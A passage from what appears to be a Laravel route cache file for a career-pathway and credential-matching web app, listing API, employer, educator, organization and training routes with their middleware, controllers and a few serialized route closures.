4 => NULL,
),
'attributes' =>
array (
'generated::efbOQtr4pKwsrn2S' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'api/pathway-requirements',
'action' =>
array (
'middleware' =>
array (
0 => 'api',
),
'uses' => 'App\\Http\\Controllers\\Api\\PathwayRequirementsController@__invoke',
'controller' => 'App\\Http\\Controllers\\Api\\PathwayRequirementsController',
'namespace' => NULL,
'prefix' => 'api',
'where' =>
array (
),
'as' => 'generated::efbOQtr4pKwsrn2S',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::Jby4ucUc2TleT40j' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'api',
'action' =>
array (
'middleware' =>
array (
0 => 'api',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:4115:"function () {
return \\response()->json([
\'service\' => \'Emaji Pathway API\',
\'version\' => \'v1\',
\'endpoints\' => [
[
\'method\' => \'GET\',
\'path\' => \'/api/pathways/professions\',
\'description\' => \'List professions available for pathway matching.\',
\'params\' => [
\'limit\' => \'Optional integer, max 500.\',
],
],
[
\'method\' => \'GET\',
\'path\' => \'/api/pathways/jobs\',
\'description\' => \'List jobs for a profession (filtered).\',
\'params\' => [
\'profession_uuid\' => \'Required UUID.\',
\'country\' => \'Optional country code (2 letters).\',
\'city\' => \'Optional city name.\',
\'limit\' => \'Optional integer, max 500.\',
\'include_inactive\' => \'Optional boolean.\',
],
],
[
\'method\' => \'POST\',
\'path\' => \'/api/pathways/requirements\',
\'description\' => \'Fetch requirements for a profession or job.\',
\'body\' => [
\'profession_uuid\' => \'Required if job_uuid not provided.\',
\'job_uuid\' => \'Required if profession_uuid not provided.\',
\'country_code\' => \'Optional country code (2 letters).\',
\'region\' => \'Optional region.\',
\'consent_token\' => \'Optional consent token.\',
],
],
[
\'method\' => \'POST\',
\'path\' => \'/api/pathways/match\',
\'description\' => \'Match credentials to professions and jobs.\',
\'body\' => [
\'credentials\' => \'Required array of {achievement_id, valid_until?, level?}.\',
\'profession_uuids\' => \'Optional array of profession UUIDs.\',
\'job_uuids\' => \'Optional array of job UUIDs.\',
\'min_match_ratio\' => \'Optional float between 0 and 1.\',
\'min_required_matched\' => \'Optional integer.\',
\'limit\' => \'Optional integer, max 500.\',
],
],
[
\'method\' => \'GET\',
\'path\' => \'/api/trainings\',
\'description\' => \'List trainings, optionally filtered by achievement or pathway.\',
\'params\' => [
\'achievement_id\' => \'Optional qualification UUID.\',
\'profession_uuid\' => \'Optional profession UUID.\',
\'job_uuid\' => \'Optional job UUID.\',
\'include_drafts\' => \'Optional boolean.\',
\'limit\' => \'Optional integer, max 500.\',
],
],
[
\'method\' => \'GET\',
\'path\' => \'/api/pathways/catalog\',
\'description\' => \'List professions and jobs together.\',
\'params\' => [
\'include\' => \'Optional comma list: professions,jobs.\',
\'limit\' => \'Optional integer, max 500.\',
\'include_inactive\' => \'Optional boolean.\',
\'country\' => \'Optional country code (2 letters).\',
\'city\' => \'Optional city name.\',
],
],
[
\'method\' => \'GET\',
\'path\' => \'/api/pathways/badge-classes\',
\'description\' => \'Search badge classes from the OpenSkillPaths public registry.\',
\'params\' => [
\'q\' => \'Optional search query.\',
\'category\' => \'Optional category filter.\',
\'issuer_did\' => \'Optional issuer DID filter.\',
\'skill\' => \'Optional skill URI or name filter.\',
\'limit\' => \'Optional integer, max 100.\',
\'offset\' => \'Optional integer for pagination.\',
],
],
],
]);
}";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"00000000000002d90000000000000000";}}',
'namespace' => NULL,
'prefix' => 'api',
'where' =>
array (
),
'as' => 'generated::Jby4ucUc2TleT40j',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::X63r8X4Jw4F25yBo' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'api/pathways/catalog',
'action' =>
array (
'middleware' =>
array (
0 => 'api',
),
'uses' => 'App\\Http\\Controllers\\Api\\PathwayCatalogController@__invoke',
'controller' => 'App\\Http\\Controllers\\Api\\PathwayCatalogController',
'namespace' => NULL,
'prefix' => 'api/pathways',
'where' =>
array (
),
'as' => 'generated::X63r8X4Jw4F25yBo',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::7zFfszm04Pk8wBuG' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'api/pathways/professions',
'action' =>
array (
'middleware' =>
array (
0 => 'api',
),
'uses' => 'App\\Http\\Controllers\\Api\\PathwayProfessionsController@__invoke',
'controller' => 'App\\Http\\Controllers\\Api\\PathwayProfessionsController',
'namespace' => NULL,
'prefix' => 'api/pathways',
'where' =>
array (
),
'as' => 'generated::7zFfszm04Pk8wBuG',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::1GhEQ4AvYzptV0Mf' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'api/pathways/jobs',
'action' =>
array (
'middleware' =>
array (
0 => 'api',
),
'uses' => 'App\\Http\\Controllers\\Api\\PathwayJobsController@__invoke',
'controller' => 'App\\Http\\Controllers\\Api\\PathwayJobsController',
'namespace' => NULL,
'prefix' => 'api/pathways',
'where' =>
array (
),
'as' => 'generated::1GhEQ4AvYzptV0Mf',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::mLfU6a5zYqaVOsHY' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'api/pathways/requirements',
'action' =>
array (
'middleware' =>
array (
0 => 'api',
),
'uses' => 'App\\Http\\Controllers\\Api\\PathwayRequirementsController@__invoke',
'controller' => 'App\\Http\\Controllers\\Api\\PathwayRequirementsController',
'namespace' => NULL,
'prefix' => 'api/pathways',
'where' =>
array (
),
'as' => 'generated::mLfU6a5zYqaVOsHY',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::kNuSOUtpjeXdIfB6' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'api/pathways/match',
'action' =>
array (
'middleware' =>
array (
0 => 'api',
),
'uses' => 'App\\Http\\Controllers\\Api\\PathwayMatchController@__invoke',
'controller' => 'App\\Http\\Controllers\\Api\\PathwayMatchController',
'namespace' => NULL,
'prefix' => 'api/pathways',
'where' =>
array (
),
'as' => 'generated::kNuSOUtpjeXdIfB6',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::7SIwyUhjN5OCckYd' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'api/pathways/badge-classes',
'action' =>
array (
'middleware' =>
array (
0 => 'api',
),
'uses' => 'App\\Http\\Controllers\\Api\\PathwayBadgeClassesController@__invoke',
'controller' => 'App\\Http\\Controllers\\Api\\PathwayBadgeClassesController',
'namespace' => NULL,
'prefix' => 'api/pathways',
'where' =>
array (
),
'as' => 'generated::7SIwyUhjN5OCckYd',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::K8t2F8Jd8h4VdOnd' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'api/trainings',
'action' =>
array (
'middleware' =>
array (
0 => 'api',
),
'uses' => 'App\\Http\\Controllers\\Api\\TrainingCatalogController@__invoke',
'controller' => 'App\\Http\\Controllers\\Api\\TrainingCatalogController',
'namespace' => NULL,
'prefix' => 'api',
'where' =>
array (
),
'as' => 'generated::K8t2F8Jd8h4VdOnd',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::V3eSZzOisUc0BFGr' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'up',
'action' =>
array (
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:813:"function () {
$exception = null;
try {
\\Illuminate\\Support\\Facades\\Event::dispatch(new \\Illuminate\\Foundation\\Events\\DiagnosingHealth);
} catch (\\Throwable $e) {
if (app()->hasDebugModeEnabled()) {
throw $e;
}
report($e);
$exception = $e->getMessage();
}
return response(\\Illuminate\\Support\\Facades\\View::file(\'/var/www/html/emaji/vendor/laravel/framework/src/Illuminate/Foundation/Configuration\'.\'/../resources/health-up.blade.php\', [
\'exception\' => $exception,
]), status: $exception ? 500 : 200);
}";s:5:"scope";s:54:"Illuminate\\Foundation\\Configuration\\ApplicationBuilder";s:4:"this";N;s:4:"self";s:32:"00000000000002e00000000000000000";}}',
'as' => 'generated::V3eSZzOisUc0BFGr',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'demo.landing' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => '/',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:43:"function() {
return \\view(\'landing\');
}";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"00000000000002e60000000000000000";}}',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'demo.landing',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'demo.pathway-builder' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'demo/pathway-builder',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\DemoPathwayController@index',
'controller' => 'App\\Http\\Controllers\\DemoPathwayController@index',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'demo.pathway-builder',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'qualification.skillwallet.detail' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'qualifications/detail/{uuid}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\QualificationController@showFromSkillwallet',
'controller' => 'App\\Http\\Controllers\\QualificationController@showFromSkillwallet',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'qualification.skillwallet.detail',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'employer.welcome' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'employer',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\EmployerController@welcome',
'controller' => 'App\\Http\\Controllers\\EmployerController@welcome',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'employer.welcome',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'educator.welcome' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'educator',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:59:"function(){
return \\view(\'educator.welcome\');
}";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"00000000000002ec0000000000000000";}}',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'educator.welcome',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'contact.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'contact',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\ContactRequestController@store',
'controller' => 'App\\Http\\Controllers\\ContactRequestController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'contact.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.qualifications' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'jobs/qualifications',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\JobController@qualificationsForProfession',
'controller' => 'App\\Http\\Controllers\\JobController@qualificationsForProfession',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.qualifications',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.validate-url' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'jobs/validate-url',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\JobController@validateJobUrl',
'controller' => 'App\\Http\\Controllers\\JobController@validateJobUrl',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.validate-url',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.generate-description' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'jobs/generate-description',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\JobController@generateJobDescription',
'controller' => 'App\\Http\\Controllers\\JobController@generateJobDescription',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.generate-description',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.searchitem' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'jobs/searchitem',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\JobController@searchitem',
'controller' => 'App\\Http\\Controllers\\JobController@searchitem',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.searchitem',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'onboarding.show' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'onboarding',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\OnboardingController@show',
'controller' => 'App\\Http\\Controllers\\OnboardingController@show',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'onboarding.show',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'onboarding.complete' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'onboarding/complete',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\OnboardingController@complete',
'controller' => 'App\\Http\\Controllers\\OnboardingController@complete',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'onboarding.complete',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'employer.jobs' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'employer/jobs',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\JobController@index',
'controller' => 'App\\Http\\Controllers\\JobController@index',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'employer.jobs',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'jobs/create',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\JobController@create',
'controller' => 'App\\Http\\Controllers\\JobController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.wizard' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'jobs/wizard',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\JobController@wizard',
'controller' => 'App\\Http\\Controllers\\JobController@wizard',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.wizard',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'jobs',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\JobController@store',
'controller' => 'App\\Http\\Controllers\\JobController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.edit' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'jobs/{job}/edit',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\JobController@edit',
'controller' => 'App\\Http\\Controllers\\JobController@edit',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.edit',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.update' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'jobs/{job}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\JobController@update',
'controller' => 'App\\Http\\Controllers\\JobController@update',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'jobs.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'jobs/{job}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\JobController@destroy',
'controller' => 'App\\Http\\Controllers\\JobController@destroy',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'jobs.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'employer.jobs.toggleStatus' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'employer/jobs/{job}/toggle-status',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\JobController@toggleStatus',
'controller' => 'App\\Http\\Controllers\\JobController@toggleStatus',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'employer.jobs.toggleStatus',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'organizations.public' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'organizations/{organization}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\OrganizationController@showPublic',
'controller' => 'App\\Http\\Controllers\\OrganizationController@showPublic',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'organizations.public',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
'organization' => 'uuid',
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'organization.show' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'organization',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\OrganizationController@show',
'controller' => 'App\\Http\\Controllers\\OrganizationController@show',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'organization.show',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'organization.edit' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'organization/settings',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\OrganizationController@edit',
'controller' => 'App\\Http\\Controllers\\OrganizationController@edit',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'organization.edit',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'organization.update' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'organization/settings',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\OrganizationController@update',
'controller' => 'App\\Http\\Controllers\\OrganizationController@update',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'organization.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'organization.update.badgau' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'organization/settings/badgau',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\OrganizationController@updateBadgau',
'controller' => 'App\\Http\\Controllers\\OrganizationController@updateBadgau',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'organization.update.badgau',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'organization.credentials.index' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'organization/credentials',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\OrganizationCredentialController@index',
'controller' => 'App\\Http\\Controllers\\OrganizationCredentialController@index',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'organization.credentials.index',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'organization.credentials.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'organization/credentials/upload',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\OrganizationCredentialController@create',
'controller' => 'App\\Http\\Controllers\\OrganizationCredentialController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'organization.credentials.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'organization.credentials.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'organization/credentials',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\OrganizationCredentialController@store',
'controller' => 'App\\Http\\Controllers\\OrganizationCredentialController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'organization.credentials.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'organization.credentials.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'organization/credentials/{credential}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\OrganizationCredentialController@destroy',
'controller' => 'App\\Http\\Controllers\\OrganizationCredentialController@destroy',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'organization.credentials.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'educator.dashboard' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'educator/dashboard',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\EducatorController@dashboard',
'controller' => 'App\\Http\\Controllers\\EducatorController@dashboard',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'educator.dashboard',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.index' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'trainings',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@index',
'controller' => 'App\\Http\\Controllers\\TrainingController@index',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.index',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.wizard' =>
array (
